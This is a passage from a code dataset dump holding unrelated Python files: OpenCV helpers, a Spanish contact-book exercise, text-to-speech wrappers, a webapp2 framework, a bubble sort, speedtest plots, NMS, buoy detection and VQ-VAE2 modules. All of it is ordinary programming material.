column * (self.spaceY + item.sizeHint().height()) + self.spaceY\n item.setGeometry(QtCore.QRect(QtCore.QPoint(rowcount, column), item.sizeHint()))\n count += 1 \n\n \n return self.height\n \n ","repo_name":"5k1n2/Porta","sub_path":"view/VertexFlowLayout.py","file_name":"VertexFlowLayout.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31258438329","text":"import cv2\nimport numpy as np\n\ndef draw_text(img, text,\n font=cv2.FONT_HERSHEY_SIMPLEX,\n pos=(0, 0),\n font_scale=1,\n font_thickness=2,\n text_color=(0, 255, 0),\n text_color_bg=(0, 0, 0)\n ):\n\n x, y = pos\n text_size, _ = cv2.getTextSize(text, font, font_scale, font_thickness)\n text_w, text_h = text_size\n cv2.rectangle(img, pos, (x + text_w, y + text_h), text_color_bg, -1)\n cv2.putText(img, text, (x, y + text_h + font_scale - 1), font, font_scale, text_color, font_thickness)\n\n return text_size\n\n\nimage = 127 * np.ones((100, 200, 3), dtype=\"uint8\")\npos = (10, 10)\nw, h = draw_text(image, \"leander\", pos=(10, 10))\ndraw_text(image, \"gwapo\", font_scale=1, pos=(10, 20 + h), text_color_bg=(255, 0, 0))\ncv2.imshow(\"image\", image)\ncv2.waitKey()","repo_name":"leander0909/Thesis","sub_path":"Yolov5_DeepSort_Pytorch/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"26716540075","text":"\"\"\"\nEjercicio 5\nRealizar una clase que administre una agenda. Se debe almacenar para cada contacto\nel nombre, el teléfono y el email. Además deberá mostrar un menú con las siguientes\nopciones: \n-Añadir contacto\n-Lista de contactos\n-Buscar contacto\n-Editar contacto\n-Cerrar agenda\n\"\"\"\n\n# clases\nclass Agenda:\n def __init__(self):\n self.contactos = {\n 'Federico':{'Numero':665455565,'Mail':'fede@gmail.com'},\n 'Juan':{'Numero':654789988,'Mail':'juan@gmail.com'},\n 'Lucas':{'Numero':665123456,'Mail':'lucas@gmail.com'}\n }\n\n def listar(self):\n for contacto in self.contactos:\n print(f'''\nNombre: {contacto} \nNumero: {self.contactos[contacto]['Numero']}\nMail: {self.contactos[contacto]['Mail']}''')\n input(\"\\nPresione enter para volver al menu.\")\n\n def buscar(self):\n busqueda = input(\"\\nEscriba el nombre a buscar: \").capitalize()\n if busqueda in self.contactos:\n print(f'''\nNombre: {busqueda} \nNumero: {self.contactos[busqueda]['Numero']}\nMail: {self.contactos[busqueda]['Mail']}\n ''')\n input(\"\\nPresione enter para volver al menu.\")\n else:\n print(\"\\nNo se encuentra el contacto\\n\")\n op = input(\"Quieres buscar nuevamente?\\n[1] - Si\\n[2] - No\\n\")\n if op == \"1\":\n self.buscar()\n\n \n def crear(self):\n nombre = input(\"\\nEscriba el nombre del contacto: \").capitalize()\n if nombre in self.contactos:\n print(\"Se encontro el siguiente contacto con ese nombre\\n\")\n print(f'''\nNombre: {nombre} \nNumero: {self.contactos[nombre]['Numero']}\nMail: {self.contactos[nombre]['Mail']}\n ''')\n op = input(\n f\"Esta seguro que quieres sobrescribir el contacto?\\n[1] - Si\\n[2] - No\\n\"\n )\n if op == \"1\":\n while True:\n print(f\"Nombre del contacto: {nombre}\")\n telefono = input(\"Escriba el numero de telefono: \")\n try:\n telefono = int(telefono)\n break\n except:\n print('\\nDebes ingresar solo numeros\\n')\n mail = input(\"Escriba el mail: \")\n self.contactos[nombre] = {'Numero':telefono,'Mail':mail}\n print(f\"\\nSe agrego el contacto '{nombre}' en la 
agenda.\\n\")\n else:\n self.crear()\n else:\n while True:\n telefono = input(\"Escriba el numero de telefono: \")\n try:\n telefono = int(telefono)\n break\n except:\n print('\\nDebes ingresar solo numeros\\n')\n mail = input(\"Escriba el mail: \")\n self.contactos[nombre] = {'Numero':telefono,'Mail':mail}\n print(f\"\\nSe agrego el contacto '{nombre}' en la agenda.\\n\")\n\n def editar(self):\n nombre = input(\"\\nEscriba el nombre del contacto a editar: \").capitalize()\n if nombre in self.contactos:\n print(\"Se encontro el siguiente contacto con ese nombre\\n\")\n print(f'''\nNombre: {nombre}\nNumero: {self.contactos[nombre]['Numero']}\nMail: {self.contactos[nombre]['Mail']}\n ''')\n op = input(\n f\"Esta seguro que quieres editar el contacto?\\n[1] - Si\\n[2] - No\\n\"\n )\n if op == \"1\":\n while True:\n print(f\"Nombre del contacto: {nombre}\")\n telefono = input(\"Escriba el numero de telefono: \")\n try:\n telefono = int(telefono)\n break\n except:\n print(f'Debes ingresar solo numeros')\n mail = input(\"Escriba el mail: \")\n print(f\"\\nNombre del contacto: {nombre}\")\n print(f\"Telefono del contacto: {telefono}\")\n print(f\"Mail del contacto: {mail}\\n\")\n self.contactos[nombre] = {'Numero':telefono,'Mail':mail}\n print(f\"\\nSe modifico el contacto '{nombre}' en la agenda.\\n\")\n else:\n self.editar()\n else:\n print(\"\\nNo se encuentra el contacto\\n\")\n op = input(\"Quieres buscar nuevamente?\\n[1] - Si\\n[2] - No\\n\")\n if op == \"1\":\n self.editar()\n\n def borrar(self):\n busqueda = input(\"\\nEscriba el nombre a buscar: \").capitalize()\n if busqueda in self.contactos:\n op = input(f'''\nEsta seguro que desea borrar el siguiente contacto?\n\nNombre: {busqueda} \nNumero: {self.contactos[busqueda]['Numero']}\nMail: {self.contactos[busqueda]['Mail']}\n\n[1] - Si\n[2] - No\n\n''' )\n if op == \"1\":\n del self.contactos[busqueda]\n print(f\"\\nEl contacto '{busqueda}' se borro correctamente.\\n\")\n else:\n op = input(\"Quieres buscar nuevamente?\\n[1] - Si\\n[2] - No\\n\")\n if op == \"1\":\n self.borrar()\n else:\n print(\"\\nNo se encuentra el contacto\\n\")\n op = input(\"Quieres buscar nuevamente?\\n[1] - Si\\n[2] - No\\n\")\n if op == \"1\":\n self.borrar()\n \n\n# funciones\ndef menu():\n print(\"\\n- M E N U -\")\n print(\"[1] - Ver agenda\")\n print(\"[2] - Buscar contacto\")\n print(\"[3] - Agregar contacto\")\n print(\"[4] - Editar contacto\")\n print(\"[5] - Borrar contacto\")\n print(\"[6] - Salir\\n\")\n\n opcion = input(\"Elija una opcion: \")\n validar_opcion(opcion)\n\n\ndef validar_opcion(opcion):\n if opcion == \"1\":\n agenda.listar()\n elif opcion == \"2\":\n agenda.buscar()\n elif opcion == \"3\":\n agenda.crear()\n elif opcion == \"4\":\n agenda.editar()\n elif opcion == \"5\":\n agenda.borrar()\n elif opcion == \"6\":\n print(\"\\nAdios!\")\n exit()\n else:\n print(\"\\nOpcion incorrecta, intente nuevamente\\n\")\n menu()\n\n\n\n# programa\nprint(\" - - - A G E N D A - - - \")\nagenda = Agenda()\nwhile True:\n menu()\n\n","repo_name":"Lartweib/Bootcamp-Python-MachineLearning","sub_path":"Python/Ejercicios/POO/Ejercicio 5 -clase agenda.py","file_name":"Ejercicio 5 -clase agenda.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"16911124268","text":"import uuid\n\nimport boto3\nfrom google.cloud import texttospeech\nfrom talko_lingo.utils.config import get_pipeline_config\nfrom talko_lingo.utils.job_id import 
extract_input_output_lang_from_job_id\n\n\nclass AwsTextToSpeech(object):\n def run(self, text, output_bucket, job_id):\n _, output_lang = extract_input_output_lang_from_job_id(job_id)\n voices = {\n 'fr-CA': 'Chantal',\n 'en-AU': 'Nicole',\n 'en-US': 'Joanna',\n 'en-GB': 'Emma',\n 'es-US': 'Penelope',\n }\n\n polly_client = boto3.client('polly')\n polly_client.start_speech_synthesis_task(\n OutputFormat='mp3',\n OutputS3BucketName=output_bucket.name,\n OutputS3KeyPrefix='output/{}/'.format(job_id),\n Text=text,\n VoiceId=voices[output_lang],\n LanguageCode=output_lang\n )\n\n\nclass GcpTextToSpeech(object):\n def run(self, text, output_bucket, job_id):\n _, output_lang = extract_input_output_lang_from_job_id(job_id)\n client = texttospeech.TextToSpeechClient()\n synthesis_input = texttospeech.types.SynthesisInput(text=text)\n\n voice = texttospeech.types.VoiceSelectionParams(\n language_code=output_lang,\n ssml_gender=texttospeech.enums.SsmlVoiceGender.FEMALE,\n )\n\n audio_config = texttospeech.types.AudioConfig(\n audio_encoding=texttospeech.enums.AudioEncoding.MP3,\n )\n\n response = client.synthesize_speech(synthesis_input, voice, audio_config)\n\n s3 = boto3.resource('s3')\n key = 'output/{}/{}.mp3'.format(job_id, str(uuid.uuid4()))\n s3object = s3.Object(output_bucket.name, key)\n s3object.put(Body=response.audio_content)\n\n\ndef text_to_speech(text, output_bucket, job_id):\n pipeline_config = get_pipeline_config()\n text_to_speech_mode = pipeline_config.get('TextToSpeechMode', 'aws')\n text_to_speech_class = AwsTextToSpeech if text_to_speech_mode == 'aws' else GcpTextToSpeech\n text_to_speech_class().run(text=text, output_bucket=output_bucket, job_id=job_id)\n","repo_name":"deborabr21/talko-lingo","sub_path":"src/cloud/s3_event_handlers/talko_lingo/utils/text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4638418790","text":"from audi.http.response import JSONResponse\n\nimport os\nimport sys\nimport json\nimport importlib\nimport webapp2\n\n\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), 'external'))\n\n\nclass Audi(webapp2.WSGIApplication):\n def __init__(self, debug=True, conf=None):\n super(Audi, self).__init__(debug=debug, config=self._update_conf(conf))\n self._initialize()\n\n def _update_conf(self, cust_conf):\n from settings import config as audi_config\n for name, value in cust_conf.iteritems():\n if name == 'template_path':\n audi_config['webapp2_extras.jinja2']['template_path'] += value\n else:\n audi_config[name] = value\n return audi_config\n\n def _initialize(self):\n self.router.set_dispatcher(self.__class__.dispatcher)\n\n self._load_app_routes()\n\n self._load_authenticator()\n\n self._load_default_err_handlers()\n\n def _load_app_routes(self):\n for app_mod_name in self.config['installed_apps']:\n app_routes = importlib.import_module('%s.routes' % app_mod_name)\n for r in app_routes.routes:\n self.router.add(r)\n\n def _load_authenticator(self):\n auth_cfg = self.config.get('auth')\n if not auth_cfg:\n return None\n\n auth_mod = auth_cfg.get('class', None)\n auth_args = auth_cfg.get('args', {})\n if auth_mod:\n split_names = auth_mod.split('.')\n mod_name = '.'.join(split_names[0:-1])\n cls_name = split_names[-1]\n auth_cls = getattr(importlib.import_module(mod_name), cls_name)\n self.authenticator = auth_cls(auth_args.values(), **auth_args)\n\n def _load_default_err_handlers(self):\n if not 
self.debug:\n            from .contrib.error_handler import handle_error\n            for status_code in self.config['error_templates']:\n                self.error_handlers[status_code] = handle_error\n\n    @staticmethod\n    def dispatcher(router, request, response):\n        request.json = {}\n        if request.headers.get('Content-Type') == 'application/json':\n            request.json = json.loads(request.body)\n\n        rv = router.default_dispatcher(request, response)\n        if isinstance(rv, basestring):\n            rv = webapp2.Response(rv)\n        elif isinstance(rv, tuple):\n            rv = webapp2.Response(*rv)\n        elif isinstance(rv, dict) or isinstance(rv, list):\n            rv = JSONResponse(rv)\n\n        for r in [rv, response]:\n            if r:\n                r.headers['Access-Control-Allow-Origin'] = '*'\n\n        return rv\n\n    @classmethod\n    def create_app(cls, conf):\n        assert conf is not None\n\n        env_sw = 'SERVER_SOFTWARE'\n        is_debug = env_sw not in os.environ or os.environ[env_sw].startswith('Dev')\n        return cls(debug=is_debug, conf=conf)\n","repo_name":"sangwonl/audi","sub_path":"audi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42121137027","text":"\"\"\"\nGiven an array of integers, sort the array in ascending order using the Bubble Sort algorithm above.\nOnce sorted, print the following three lines:\n\nArray is sorted in numSwaps swaps., where numSwaps is the number of swaps that took place.\nFirst Element: firstElement, where firstElement is the first element in the sorted array.\nLast Element: lastElement, where lastElement is the last element in the sorted array.\n\"\"\"\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the countSwaps function below.\ndef countSwaps(a):\n    l = len(a)\n    numSwap = 0\n    for i in range(l):\n        for j in range(l-i-1):\n            if a[j] > a[j+1]:\n                a[j],a[j+1] = a[j+1],a[j]\n                numSwap += 1\n    print('Array is sorted in %d swaps.' 
% numSwap)\n print('First Element: %d' % a[0])\n print('Last Element: %d' % a[-1])\n\nif __name__ == '__main__':\n n = int(input())\n a = list(map(int, input().rstrip().split()))\n countSwaps(a)\n","repo_name":"irfa89/HackerRank-InterviewPreparation","sub_path":"bubbleSort.py","file_name":"bubbleSort.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34298837614","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom dateutil import parser as dateparser\n\ndf = pd.read_csv('speedtests.csv')\ndf.to_numpy()\n\ndownloads = df['Download'].to_numpy()\ndownloads_in_mbits = downloads/1000000\ndownloads_in_mbits_round = downloads_in_mbits.round(2)\nmean_download_mbits = downloads_in_mbits.mean().round(2)\nmedian_downloads = np.median(downloads_in_mbits_round)\nmid_down = np.max(downloads_in_mbits_round) - np.min(downloads_in_mbits_round) \nmid_down = mid_down/2 + np.min(downloads_in_mbits_round) \n\nprint(\"Mean Download \" + str(mean_download_mbits) + \" MBit/s\")\n\nuploads = df['Upload'].to_numpy()\nuploads_in_mbits = uploads/1000000\nuploads_in_mbits_round = uploads_in_mbits.round(2)\nmean_upload_mbits = uploads_in_mbits.mean().round(2)\nmedian_uploads = np.median(uploads_in_mbits_round)\nmid_up = np.max(uploads_in_mbits_round) - np.min(uploads_in_mbits_round) \nmid_up = mid_up/2 + np.min(uploads_in_mbits_round) \n\nprint(\"Mean Upload \" + str(mean_upload_mbits) + \" MBit/s\")\n\ntimestamps = df['Timestamp'].to_numpy()\ntimestamps = [dateparser.parse(time) for time in timestamps]\n\n########################################################################\n### Some plots\n\nfig = plt.figure()\nax = fig.add_subplot()\n\nax.set_title(\"Download Speed\")\nax.plot(timestamps, downloads_in_mbits_round, label=\"Download Speed\")\nax.set_xlabel(\"Time\")\nax.set_ylabel(\"MBit/s\")\nax.grid(True)\nax.fill_between(timestamps, 26, 34, alpha=0.1)\nax.fill_between(timestamps, downloads_in_mbits_round - 1, downloads_in_mbits_round + 1, alpha=0.3)\nax.legend()\nplt.show()\n\nfig = plt.figure()\nax = fig.add_subplot()\nax.set_title(\"Up- and Download Speed\")\nax.plot(timestamps, downloads_in_mbits_round, label=\"Download Speed\")\nax.plot(timestamps, uploads_in_mbits_round, label=\"Upload Speed\")\nax.set_xlabel(\"Time\")\nax.set_ylabel(\"MBit/s\")\nax.grid(True)\nax.fill_between(timestamps, 26, 34, alpha=0.1)\nax.fill_between(timestamps, 2, 7, alpha=0.1)\nax.fill_between(timestamps, downloads_in_mbits_round - 1, downloads_in_mbits_round + 1, alpha=0.3)\nax.fill_between(timestamps, uploads_in_mbits_round - 1, uploads_in_mbits_round + 1, alpha=0.3)\nax.legend()\nplt.show()\n\n### Box \n\nfig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(nrows=2, ncols=2, figsize=(9, 4))\nbplot1 = ax1.boxplot(downloads_in_mbits_round,\n vert=True, # vertical box alignment\n patch_artist=True, # fill with color\n ) # will be used to label x-ticks\nax1.set_title('Download')\nax1.text(0.7,mid_down, \"Mean: \" + str(mean_download_mbits) \n + \"\\nMin: \" + str(np.min(downloads_in_mbits_round))\n + \"\\nMax: \" + str(np.max(downloads_in_mbits_round))\n + \"\\nMedian:\" + str(median_downloads),\n style='italic',\n bbox={'facecolor': 'red', 'alpha': 0.2, 'pad': 10}\n )\n\nbplot3 = ax3.boxplot(uploads_in_mbits_round,\n vert=True, # vertical box alignment\n patch_artist=True, # fill with color\n ) # will be used to label x-ticks\nax3.set_title('Upload')\nax3.text(0.7,mid_up, \"Mean: \" + 
str(mean_upload_mbits) \n        + \"\nMin: \" + str(np.min(uploads_in_mbits_round))\n        + \"\nMax: \" + str(np.max(uploads_in_mbits_round))\n        + \"\nMedian:\" + str(median_uploads),\n        style='italic',\n        bbox={'facecolor': 'red', 'alpha': 0.2, 'pad': 10}\n        )\n\nbplot2 = ax2.boxplot(downloads_in_mbits_round,\n                     notch=True,  # notch shape\n                     vert=True,  # vertical box alignment\n                     patch_artist=True,  # fill with color\n                     )  # will be used to label x-ticks\nax2.set_title('Download (notched)')\nbplot4 = ax4.boxplot(uploads_in_mbits_round,\n                     notch=True,  # notch shape\n                     vert=True,  # vertical box alignment\n                     patch_artist=True,  # fill with color\n                     )  # will be used to label x-ticks\nax4.set_title('Upload (notched)')\n\nplt.show()","repo_name":"hitbear/speedpi","sub_path":"src/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44165927080","text":"# -*- coding:utf-8 -*-\n\nimport numpy as np\n\ndef py_cpu_nms(bboxes, thresh):\n\n    x1 = bboxes[:, 0]\n    y1 = bboxes[:, 1]\n    x2 = bboxes[:, 2]\n    y2 = bboxes[:, 3]\n    scores = bboxes[:, 4]\n\n    areas = (x2 - x1 + 1) * (y2 - y1 + 1)\n    order = scores.argsort()[::-1]\n\n    keep = []\n    while order.size > 0:\n        i = order[0]\n        keep.append(i)\n        xx1 = np.maximum(x1[i], x1[order[1:]])\n        yy1 = np.maximum(y1[i], y1[order[1:]])\n        xx2 = np.minimum(x2[i], x2[order[1:]])\n        yy2 = np.minimum(y2[i], y2[order[1:]])\n\n        w = np.maximum(0.0, xx2 - xx1 + 1)\n        h = np.maximum(0.0, yy2 - yy1 + 1)\n        intersection = w * h\n\n        iou = intersection / (areas[i] + areas[order[1:]] - intersection)\n\n        index = np.where(iou <= thresh)[0]\n        order = order[index + 1]\n\n    return keep\n\n\n\n","repo_name":"Michael3444/MTCNN-tf-reproduce","sub_path":"tools/nms.py","file_name":"nms.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4013109552","text":"import cv2\nimport numpy as np\nimport sys\nimport os\nimport time\n\n\n# Add the parent folder path to the system's import path\nsys.path.append(os.path.abspath('../IP_general'))\n\nfrom utils2 import masking,bounding_box, between_buoys, camera2lidar\nimport math\n\n### fps icin ###\nprev_image_time = 0\nnew_image_time = 0\na = 0\n################\n\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\nlower_red = np.array([0,59,21])\nupper_red = np.array([26,255,255])\n\n\nlower_green = np.array([53,87,59])\nupper_green = np.array([130,255,255])\n\n\nlower_yellow = np.array([14, 0, 0])\nupper_yellow = np.array([36,255,119])\n\nlower_black = np.array([0, 0, 0])\nupper_black = np.array([0,0,7])\n\ncap = cv2.VideoCapture(0)\nif not cap.isOpened():\n    print(\"camera failed\")\n\nret,image = cap.read()\nwidth = image.shape[1]\nheigth = image.shape[0]\n\nprint(width, heigth)\n\nwhile True:\n    ret,image = cap.read()\n    if not ret:\n        break\n    \n    image = cv2.resize(image, (0, 0), fx = 0.5, fy = 0.5)\n\n    hsv_frame = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n    print(\"######### red ########\")\n    mask_red = masking(hsv_frame, lower_red, upper_red, opening_kernel = 0, medianF_tresh = 0)\n    reds = bounding_box(mask_red,100,\"red\")\n    print(reds)\n\n    print(\"******* green *********\")\n    mask_green = masking(hsv_frame, lower_green, upper_green, opening_kernel = 0, medianF_tresh = 0)\n    greens= bounding_box(mask_green,100,\"green\")\n    print(greens)\n\n\n    print(\"^^^^^^ yellow ^^^^^^^\")\n    mask_yellow= masking(hsv_frame, lower_yellow, upper_yellow, opening_kernel = 0, 
medianF_tresh = 0)\n yellows= bounding_box(mask_yellow,100,\"yellow\")\n print(yellows)\n\n print(\":::::::: black ::::::\")\n mask_black = masking(hsv_frame, lower_black, upper_black, opening_kernel = 0, medianF_tresh = 0)\n blacks= bounding_box(mask_black,100,\"black\")\n print(blacks)\n\n\n \n middle = between_buoys(greens,reds) #closest middle point\n\n ##for visualising##\n try:\n if middle[1] == True:\n \n cv2.circle(image, middle[0], int(middle[2]*0.1), (255,255,255), 2)\n else:\n cv2.circle(image, middle[0], int(middle[2]*0.1), (0,0,0), 2)\n\n for i in greens:\n radius = int( math.sqrt(i[1] / math.pi))\n cv2.circle(image, i[0], radius, (0,255,0), 2)\n cv2.putText(image, \"green\", (i[0][0], i[0][1] - 15), font, 0.7, (0,255,0), 2)\n \n for j in reds:\n \n radius = int( math.sqrt(j[1] / math.pi))\n cv2.circle(image, j[0], radius, (0,0,255), 2)\n cv2.putText(image, \"red\", (j[0][0], j[0][1] - 15), font, 0.7, (0,0,255), 2)\n \n for k in yellows:\n \n radius = int( math.sqrt(k[1] / math.pi))\n cv2.circle(image, k[0], radius, (0,255,255), 2)\n cv2.putText(image, \"yellow\", (k[0][0], k[0][1] - 15), font, 0.7, (0,255,255), 2)\n \n for z in blacks:\n \n radius = int( math.sqrt(z[1] / math.pi))\n cv2.circle(image, z[0], radius, (0,255,255), 2)\n cv2.putText(image, \"black\", (z[0][0], z[0][1] - 15), font, 0.7, (0,255,255), 2)\n \n \n except:\n pass\n\n \n\n shift = int((270-60)/2)\n ratio = 60/width \n\n\n colors = [] \n\n if reds != None:\n colors += reds\n if yellows != None:\n colors += yellows\n if greens != None:\n colors += greens\n if blacks != None:\n colors += blacks\n\n\n\n print(\"*************************\")\n testr = camera2lidar(width,60,colors)\n print(testr)\n try:\n testr = camera2lidar(width,60,colors)\n print(testr)\n for i,o in enumerate(testr):\n if o != 0:\n if o == \"red\":\n ind = i - shift\n cv2.line(image, (int(ind//ratio),0 ), (int(ind//ratio), heigth), (0, 0, 255), 1)\n cv2.line(image, (int((ind+1)//ratio),0 ),(int((ind+1)//ratio), heigth), (0, 0, 255), 1)\n if o == \"green\":\n ind = i - shift\n cv2.line(image, (int(ind//ratio),0 ), (int(ind//ratio), heigth), (0, 255, 0), 1)\n cv2.line(image, (int((ind+1)//ratio),0 ),(int((ind+1)//ratio), heigth), (0, 0, 255), 1)\n if o == \"yellow\":\n ind = i - shift\n cv2.line(image, (int(ind//ratio),0 ), (int(ind//ratio), heigth), (0, 255, 255), 1)\n cv2.line(image, (int((ind+1)//ratio),0 ),(int((ind+1)//ratio), heigth), (0, 0, 255), 1)\n if o == \"black\":\n ind = i - shift\n cv2.line(image, (int(ind//ratio),0 ), (int(ind//ratio), heigth), (0, 0, 0), 1)\n cv2.line(image, (int((ind+1)//ratio),0 ),(int((ind+1)//ratio), heigth), (0, 0, 255), 1)\n \n except:\n pass\n\n\n\n\n\n\n ### fps icin ##\n new_image_time = time.time()\n fps = 1 / (new_image_time - prev_image_time)\n prev_image_time = new_image_time\n fps = int(fps)\n fps = str(fps)\n cv2.putText(image, \"fps: \" + fps, (width - 100, 25), font, 0.7, (0, 255, 255), 1, cv2.LINE_AA)\n ##########\n\n cv2.imshow(\"Image\", image)\n cv2.imshow(\"b\", mask_black)\n cv2.imshow(\"r\", mask_red)\n cv2.imshow(\"g\", mask_green)\n cv2.imshow(\"y\", mask_yellow)\n\n k = cv2.waitKey(1) \n if k == ord('q'): \n break\n \n ########\ncap.release()\ncv2.destroyAllWindows()\n\n","repo_name":"AutobeeSoftware/IP_general","sub_path":"NJORD/finding_middle_video.py","file_name":"finding_middle_video.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"71042026662","text":"import torch\nfrom 
torch import nn\nfrom torch.nn import functional as F\n\nimport gml_harm.model.vqvae2.distributed_helper as dist_fn\n\n\n# Copyright 2018 The Sonnet Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\n\n# Borrowed from https://github.com/deepmind/sonnet and ported it to PyTorch\n\n\nclass Quantize(nn.Module):\n def __init__(self, dim, n_embed, decay=0.99, eps=1e-5):\n super().__init__()\n\n self.dim = dim\n self.n_embed = n_embed\n self.decay = decay\n self.eps = eps\n\n embed = torch.randn(dim, n_embed)\n self.register_buffer(\"embed\", embed)\n self.register_buffer(\"cluster_size\", torch.zeros(n_embed))\n self.register_buffer(\"embed_avg\", embed.clone())\n\n def forward(self, input):\n flatten = input.reshape(-1, self.dim)\n dist = (\n flatten.pow(2).sum(1, keepdim=True)\n - 2 * flatten @ self.embed\n + self.embed.pow(2).sum(0, keepdim=True)\n )\n _, embed_ind = (-dist).max(1)\n embed_onehot = F.one_hot(embed_ind, self.n_embed).type(flatten.dtype)\n embed_ind = embed_ind.view(*input.shape[:-1])\n quantize = self.embed_code(embed_ind)\n\n if self.training:\n embed_onehot_sum = embed_onehot.sum(0)\n embed_sum = flatten.transpose(0, 1) @ embed_onehot\n\n dist_fn.all_reduce(embed_onehot_sum)\n dist_fn.all_reduce(embed_sum)\n\n self.cluster_size.data.mul_(self.decay).add_(\n embed_onehot_sum, alpha=1 - self.decay\n )\n self.embed_avg.data.mul_(self.decay).add_(embed_sum, alpha=1 - self.decay)\n n = self.cluster_size.sum()\n cluster_size = (\n (self.cluster_size + self.eps) / (n + self.n_embed * self.eps) * n\n )\n embed_normalized = self.embed_avg / cluster_size.unsqueeze(0)\n self.embed.data.copy_(embed_normalized)\n\n diff = F.mse_loss(input, quantize.detach(), reduction='mean')\n quantize = input + (quantize - input).detach()\n return quantize, diff, embed_ind\n\n def embed_code(self, embed_id):\n return F.embedding(embed_id, self.embed.transpose(0, 1))\n\n\nclass ResBlock(nn.Module):\n def __init__(self, in_channel, channel):\n super().__init__()\n\n self.conv = nn.Sequential(\n nn.ReLU(inplace=True),\n nn.Conv2d(in_channel, channel, 3, padding=1, bias=True),\n # nn.BatchNorm2d(channel),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel, in_channel, 1, bias=True),\n # nn.BatchNorm2d(in_channel),\n )\n\n def forward(self, input):\n out = self.conv(input)\n out += input\n\n return out\n\n\nclass Encoder(nn.Module):\n def __init__(self, in_channel, channel, n_res_block, n_res_channel, stride):\n super().__init__()\n\n if stride == 4:\n blocks = [\n nn.Conv2d(in_channel, channel // 2, 4, stride=2, padding=1, bias=True),\n # nn.BatchNorm2d(channel // 2),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel // 2, channel, 4, stride=2, padding=1, bias=True),\n # nn.BatchNorm2d(channel),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel, channel, 3, padding=1, bias=True),\n # nn.BatchNorm2d(channel),\n ]\n\n elif stride == 2:\n blocks = [\n nn.Conv2d(in_channel, channel // 2, 4, stride=2, padding=1, 
bias=True),\n # nn.BatchNorm2d(channel // 2),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel // 2, channel, 3, padding=1, bias=True),\n # nn.BatchNorm2d(channel),\n ]\n\n for i in range(n_res_block):\n blocks.append(ResBlock(channel, n_res_channel))\n\n blocks.append(nn.ReLU(inplace=True))\n\n self.blocks = nn.Sequential(*blocks)\n\n def forward(self, input):\n return self.blocks(input)\n\n\nclass Decoder(nn.Module):\n def __init__(\n self, in_channel, out_channel, channel, n_res_block, n_res_channel, stride\n ):\n super().__init__()\n\n blocks = [nn.Conv2d(in_channel, channel, 3, padding=1)]\n\n for i in range(n_res_block):\n blocks.append(ResBlock(channel, n_res_channel))\n\n blocks.append(nn.ReLU(inplace=True))\n\n if stride == 4:\n blocks.extend(\n [\n nn.ConvTranspose2d(channel, channel // 2, 4, stride=2, padding=1, bias=True),\n # nn.BatchNorm2d(channel // 2),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(\n channel // 2, out_channel, 4, stride=2, padding=1\n ),\n ]\n )\n\n elif stride == 2:\n blocks.append(\n nn.ConvTranspose2d(channel, out_channel, 4, stride=2, padding=1)\n )\n\n self.blocks = nn.Sequential(*blocks)\n\n def forward(self, input):\n return self.blocks(input)\n\n","repo_name":"foolsholder/gml-harmonization","sub_path":"gml_harm/model/vqvae2/vqvae_entities.py","file_name":"vqvae_entities.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23916497587","text":"def combination(arr, r):\n arr = sorted(arr)\n result = []\n\n def helper(chosen):\n if len(chosen) == r:\n print(chosen)\n result.append(chosen[:])\n return\n\n start_index = arr.index(chosen[-1]) + 1 if chosen else 0\n end_index = len(arr)\n for index in range(start_index, end_index):\n chosen.append(arr[index])\n helper(chosen)\n chosen.pop()\n\n helper([])\n\n return result\n\n\ndef solution():\n combination([1, 2, 3], 2)\n\n\nif __name__ == '__main__':\n solution()\n","repo_name":"is2js/CleanCode","sub_path":"concept/03_상태배열_동적트리순회와_순열조합/08_조합복습.py","file_name":"08_조합복습.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11813587692","text":"import argparse\nimport codecs\nimport glob\nimport os\nimport sys\nfrom collections import Counter\nfrom email import message_from_string\nfrom email.parser import FeedParser\nfrom enum import Enum, auto\nfrom functools import partial\nfrom typing import 